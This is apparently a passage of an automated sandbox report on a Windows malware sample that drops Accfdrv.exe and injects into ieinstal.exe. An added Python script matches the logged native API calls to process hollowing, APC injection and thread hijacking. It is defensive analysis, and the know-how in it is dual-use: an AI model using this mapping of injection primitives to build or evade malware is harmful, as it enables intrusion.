Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_03479860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034798F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_034798F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479710 NtQueryInformationToken,LdrInitializeThunk, 2_2_03479710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479FE0 NtCreateMutant,LdrInitializeThunk, 2_2_03479FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479780 NtMapViewOfSection,LdrInitializeThunk, 2_2_03479780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034797A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_034797A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_03479660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034796E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_034796E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479540 NtReadFile,LdrInitializeThunk, 2_2_03479540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034795D0 NtClose,LdrInitializeThunk, 2_2_034795D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479B00 NtSetValueKey, 2_2_03479B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0347A3B0 NtGetContextThread, 2_2_0347A3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479A10 NtQuerySection, 2_2_03479A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479A80 NtOpenDirectoryObject, 2_2_03479A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479950 NtQueueApcThread, 2_2_03479950
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034799D0 NtCreateProcessEx, 2_2_034799D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0347B040 NtSuspendThread, 2_2_0347B040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479820 NtEnumerateKey, 2_2_03479820
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034798A0 NtWriteVirtualMemory, 2_2_034798A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479760 NtOpenProcess, 2_2_03479760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479770 NtSetInformationFile, 2_2_03479770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0347A770 NtOpenThread, 2_2_0347A770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0347A710 NtOpenProcessToken, 2_2_0347A710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479730 NtQueryVirtualMemory, 2_2_03479730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479650 NtQueryValueKey, 2_2_03479650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479670 NtQueryInformationProcess, 2_2_03479670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479610 NtEnumerateValueKey, 2_2_03479610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034796D0 NtCreateKey, 2_2_034796D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479560 NtWriteFile, 2_2_03479560
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479520 NtWaitForSingleObject, 2_2_03479520
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0347AD30 NtSetContextThread, 2_2_0347AD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034795F0 NtQueryInformationFile, 2_2_034795F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_00417BA0 NtCreateFile, 6_2_00417BA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_00417C50 NtReadFile, 6_2_00417C50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_00417CD0 NtClose, 6_2_00417CD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_00417D80 NtAllocateVirtualMemory, 6_2_00417D80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_00417BF2 NtReadFile, 6_2_00417BF2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_00417B9A NtCreateFile, 6_2_00417B9A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_00417CCA NtClose, 6_2_00417CCA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_00417D7A NtAllocateVirtualMemory, 6_2_00417D7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9A00 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_030B9A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9A20 NtResumeThread,LdrInitializeThunk, 6_2_030B9A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9A50 NtCreateFile,LdrInitializeThunk, 6_2_030B9A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_030B9910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B99A0 NtCreateSection,LdrInitializeThunk, 6_2_030B99A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9840 NtDelayExecution,LdrInitializeThunk, 6_2_030B9840
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_030B9860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B98F0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_030B98F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9710 NtQueryInformationToken,LdrInitializeThunk, 6_2_030B9710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9780 NtMapViewOfSection,LdrInitializeThunk, 6_2_030B9780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B97A0 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_030B97A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9FE0 NtCreateMutant,LdrInitializeThunk, 6_2_030B9FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_030B9660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B96E0 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_030B96E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9540 NtReadFile,LdrInitializeThunk, 6_2_030B9540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B95D0 NtClose,LdrInitializeThunk, 6_2_030B95D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9B00 NtSetValueKey, 6_2_030B9B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030BA3B0 NtGetContextThread, 6_2_030BA3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9A10 NtQuerySection, 6_2_030B9A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9A80 NtOpenDirectoryObject, 6_2_030B9A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9950 NtQueueApcThread, 6_2_030B9950
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B99D0 NtCreateProcessEx, 6_2_030B99D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9820 NtEnumerateKey, 6_2_030B9820
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030BB040 NtSuspendThread, 6_2_030BB040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B98A0 NtWriteVirtualMemory, 6_2_030B98A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030BA710 NtOpenProcessToken, 6_2_030BA710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9730 NtQueryVirtualMemory, 6_2_030B9730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9760 NtOpenProcess, 6_2_030B9760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9770 NtSetInformationFile, 6_2_030B9770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030BA770 NtOpenThread, 6_2_030BA770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9610 NtEnumerateValueKey, 6_2_030B9610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9650 NtQueryValueKey, 6_2_030B9650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9670 NtQueryInformationProcess, 6_2_030B9670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B96D0 NtCreateKey, 6_2_030B96D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9520 NtWaitForSingleObject, 6_2_030B9520
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030BAD30 NtSetContextThread, 6_2_030BAD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9560 NtWriteFile, 6_2_030B9560
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B95F0 NtQueryInformationFile, 6_2_030B95F0
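Read as a set rather than one call at a time, the native functions listed for ieinstal.exe (process 2 and process 6) cover every primitive of the injection techniques the report flags elsewhere: NtCreateProcessEx, NtUnmapViewOfSection, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtSetContextThread and NtResumeThread for process hollowing; NtOpenThread plus NtQueueApcThread for APC injection; NtSuspendThread, NtGetContextThread and NtSetContextThread for thread context hijacking. The addresses also show that the same code runs in both processes: every stub in the 0x0347xxxx range of process 2 reappears at exactly 0x3C0000 lower in process 6. The script below is an added example, not a sandbox rule or the report's own tooling: it parses the `Code function` lines, checks the per-process API set against requirement groups that are this example's own encoding of those well-known call sequences (NtCreateUserProcess and NtCreateThreadEx are listed as alternatives from general knowledge; they do not appear in the report), and computes the relocation deltas between the two processes. The input is a constructed subset of the lines above.

```python
"""Check per-process Nt* call sets against injection-technique patterns.

Added example, not part of the sandbox report. TECHNIQUES is this example's
own encoding of well-known call sequences (an assumption, not a sandbox rule).
"""
import re
from collections import defaultdict

# Constructed input: a subset of the report's 'Code function' lines for
# process 2 and process 6 (both ieinstal.exe).
SAMPLE_LINES = r"""
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_00417BA0 NtCreateFile, 2_2_00417BA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479A20 NtResumeThread,LdrInitializeThunk, 2_2_03479A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479780 NtMapViewOfSection,LdrInitializeThunk, 2_2_03479780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034797A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_034797A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_03479660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0347A3B0 NtGetContextThread, 2_2_0347A3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479950 NtQueueApcThread, 2_2_03479950
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034799D0 NtCreateProcessEx, 2_2_034799D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0347B040 NtSuspendThread, 2_2_0347B040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034798A0 NtWriteVirtualMemory, 2_2_034798A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03479760 NtOpenProcess, 2_2_03479760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0347A770 NtOpenThread, 2_2_0347A770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0347AD30 NtSetContextThread, 2_2_0347AD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_00417BA0 NtCreateFile, 6_2_00417BA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9A20 NtResumeThread,LdrInitializeThunk, 6_2_030B9A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9780 NtMapViewOfSection,LdrInitializeThunk, 6_2_030B9780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B97A0 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_030B97A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_030B9660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030BA3B0 NtGetContextThread, 6_2_030BA3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9950 NtQueueApcThread, 6_2_030B9950
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B99D0 NtCreateProcessEx, 6_2_030B99D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030BB040 NtSuspendThread, 6_2_030BB040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B98A0 NtWriteVirtualMemory, 6_2_030B98A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B9760 NtOpenProcess, 6_2_030B9760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030BA770 NtOpenThread, 6_2_030BA770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030BAD30 NtSetContextThread, 6_2_030BAD30
"""

CALL_RE = re.compile(
    r"Code function: (?P<proc>\d+)_\d+_(?P<addr>[0-9A-Fa-f]+) (?P<names>[A-Za-z0-9_,]+)")

# Each technique is a list of requirement groups; every group must be satisfied
# by at least one of its alternatives. Assumed encoding, this example's own.
TECHNIQUES = {
    "process hollowing": [
        {"NtCreateProcessEx", "NtCreateUserProcess"}, {"NtUnmapViewOfSection"},
        {"NtAllocateVirtualMemory", "NtMapViewOfSection"},
        {"NtWriteVirtualMemory", "NtMapViewOfSection"},
        {"NtSetContextThread"}, {"NtResumeThread"},
    ],
    "APC injection": [
        {"NtOpenProcess", "NtCreateProcessEx"},
        {"NtAllocateVirtualMemory", "NtMapViewOfSection"},
        {"NtWriteVirtualMemory", "NtMapViewOfSection"},
        {"NtOpenThread", "NtCreateThreadEx"}, {"NtQueueApcThread"},
    ],
    "thread context hijacking": [
        {"NtOpenThread"}, {"NtSuspendThread"}, {"NtGetContextThread"},
        {"NtSetContextThread"}, {"NtResumeThread"},
    ],
}


def parse_calls(text):
    """Return {process_index: {api_name: set(addresses)}} for Nt* calls only;
    trailing tags such as LdrInitializeThunk are dropped."""
    calls = defaultdict(lambda: defaultdict(set))
    for m in CALL_RE.finditer(text):
        for name in m["names"].split(","):
            if name.startswith("Nt"):
                calls[int(m["proc"])][name].add(int(m["addr"], 16))
    return calls


def match_techniques(apis):
    """Map technique -> (matched, list of unsatisfied requirement groups)."""
    result = {}
    for tech, groups in TECHNIQUES.items():
        missing = [sorted(g) for g in groups if not (g & apis)]
        result[tech] = (not missing, missing)
    return result


def relocation_deltas(calls, p1, p2):
    """Address deltas between the same Nt* stubs in two processes. A handful of
    constant deltas means both processes run identical code at shifted bases."""
    deltas = set()
    for api in calls[p1].keys() & calls[p2].keys():
        a1, a2 = sorted(calls[p1][api]), sorted(calls[p2][api])
        if len(a1) == len(a2):
            deltas.update(x - y for x, y in zip(a1, a2))
    return deltas


if __name__ == "__main__":
    calls = parse_calls(SAMPLE_LINES)
    for proc in sorted(calls):
        for tech, (hit, missing) in match_techniques(set(calls[proc])).items():
            print(f"proc {proc}: {tech}: {'MATCH' if hit else 'missing ' + str(missing)}")
    print("deltas 2 vs 6:", sorted(hex(d) for d in relocation_deltas(calls, 2, 6)))
```

A delta of 0 comes from the stubs inside the hollowed image at 0x400000 (the same base in both processes); the 0x3C0000 delta is the second, separately allocated code region. Presence of the full primitive set is evidence of capability, not proof of use: the report's "Sample uses process hollowing technique" signature is what confirms the calls were actually made.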
Detected potential crypto function
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00464BC8 1_2_00464BC8
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_004021B0 1_2_004021B0
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_004484D0 1_2_004484D0
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00405758 1_2_00405758
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0041B012 2_2_0041B012
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_00401030 2_2_00401030
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0041B8CF 2_2_0041B8CF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_00408A40 2_2_00408A40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0041B411 2_2_0041B411
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0041B5DA 2_2_0041B5DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_00402D90 2_2_00402D90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_00402FB0 2_2_00402FB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0345AB40 2_2_0345AB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03502B28 2_2_03502B28
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F03DA 2_2_034F03DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034FDBD2 2_2_034FDBD2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0346EBB0 2_2_0346EBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034EFA2B 2_2_034EFA2B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_035022AE 2_2_035022AE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0343F900 2_2_0343F900
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03454120 2_2_03454120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034599BF 2_2_034599BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F1002 2_2_034F1002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0350E824 2_2_0350E824
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0345A830 2_2_0345A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_035028EC 2_2_035028EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0344B090 2_2_0344B090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034620A0 2_2_034620A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_035020A8 2_2_035020A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0350DFCE 2_2_0350DFCE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03501FF1 2_2_03501FF1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034FD616 2_2_034FD616
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03456E30 2_2_03456E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03502EF7 2_2_03502EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03501D55 2_2_03501D55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03502D07 2_2_03502D07
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03430D20 2_2_03430D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_035025DD 2_2_035025DD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0344D5E0 2_2_0344D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03462581 2_2_03462581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034FD466 2_2_034FD466
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0344841F 2_2_0344841F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_00464BC8 5_2_00464BC8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_004021B0 5_2_004021B0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_004484D0 5_2_004484D0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_00405758 5_2_00405758
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0041B012 6_2_0041B012
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_00401030 6_2_00401030
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0041B8CF 6_2_0041B8CF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_00408A40 6_2_00408A40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0041B411 6_2_0041B411
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0041B5DA 6_2_0041B5DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_00402D90 6_2_00402D90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_00402FB0 6_2_00402FB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0309A309 6_2_0309A309
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03142B28 6_2_03142B28
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0309AB40 6_2_0309AB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0311CB4F 6_2_0311CB4F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A138B 6_2_030A138B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030AEBB0 6_2_030AEBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0313DBD2 6_2_0313DBD2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_031303DA 6_2_031303DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030AABD8 6_2_030AABD8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_031223E3 6_2_031223E3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0312FA2B 6_2_0312FA2B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0309B236 6_2_0309B236
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_031422AE 6_2_031422AE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03134AEF 6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0307F900 6_2_0307F900
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03094120 6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030999BF 6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03131002 6_2_03131002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0314E824 6_2_0314E824
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0309A830 6_2_0309A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0308B090 6_2_0308B090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A20A0 6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_031420A8 6_2_031420A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_031428EC 6_2_031428EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0314DFCE 6_2_0314DFCE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03141FF1 6_2_03141FF1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0313D616 6_2_0313D616
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03096E30 6_2_03096E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03142EF7 6_2_03142EF7
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03142D07 6_2_03142D07
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03070D20 6_2_03070D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03141D55 6_2_03141D55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A2581 6_2_030A2581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03132D82 6_2_03132D82
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_031425DD 6_2_031425DD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0308D5E0 6_2_0308D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0308841F 6_2_0308841F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0313D466 6_2_0313D466
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0309B477 6_2_0309B477
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03134496 6_2_03134496
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 00419A50 appears 38 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 0307B150 appears 136 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 0343B150 appears 66 times
Source: C:\Users\user\Desktop\AT113020.exe Code function: String function: 00404770 appears 83 times
Source: C:\Users\user\Desktop\AT113020.exe Code function: String function: 00406C88 appears 62 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: String function: 0040FFEC appears 32 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: String function: 00404770 appears 109 times
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: String function: 00406C88 appears 63 times
PE file contains strange resources
Source: AT113020.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Accfdrv.exe.1.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: AT113020.exe, 00000001.00000002.239251872.0000000002430000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs AT113020.exe
Source: AT113020.exe, 00000001.00000002.239846712.0000000002780000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamecomctl32.DLL.MUIj% vs AT113020.exe
Source: AT113020.exe, 00000001.00000002.239870107.0000000002790000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs AT113020.exe
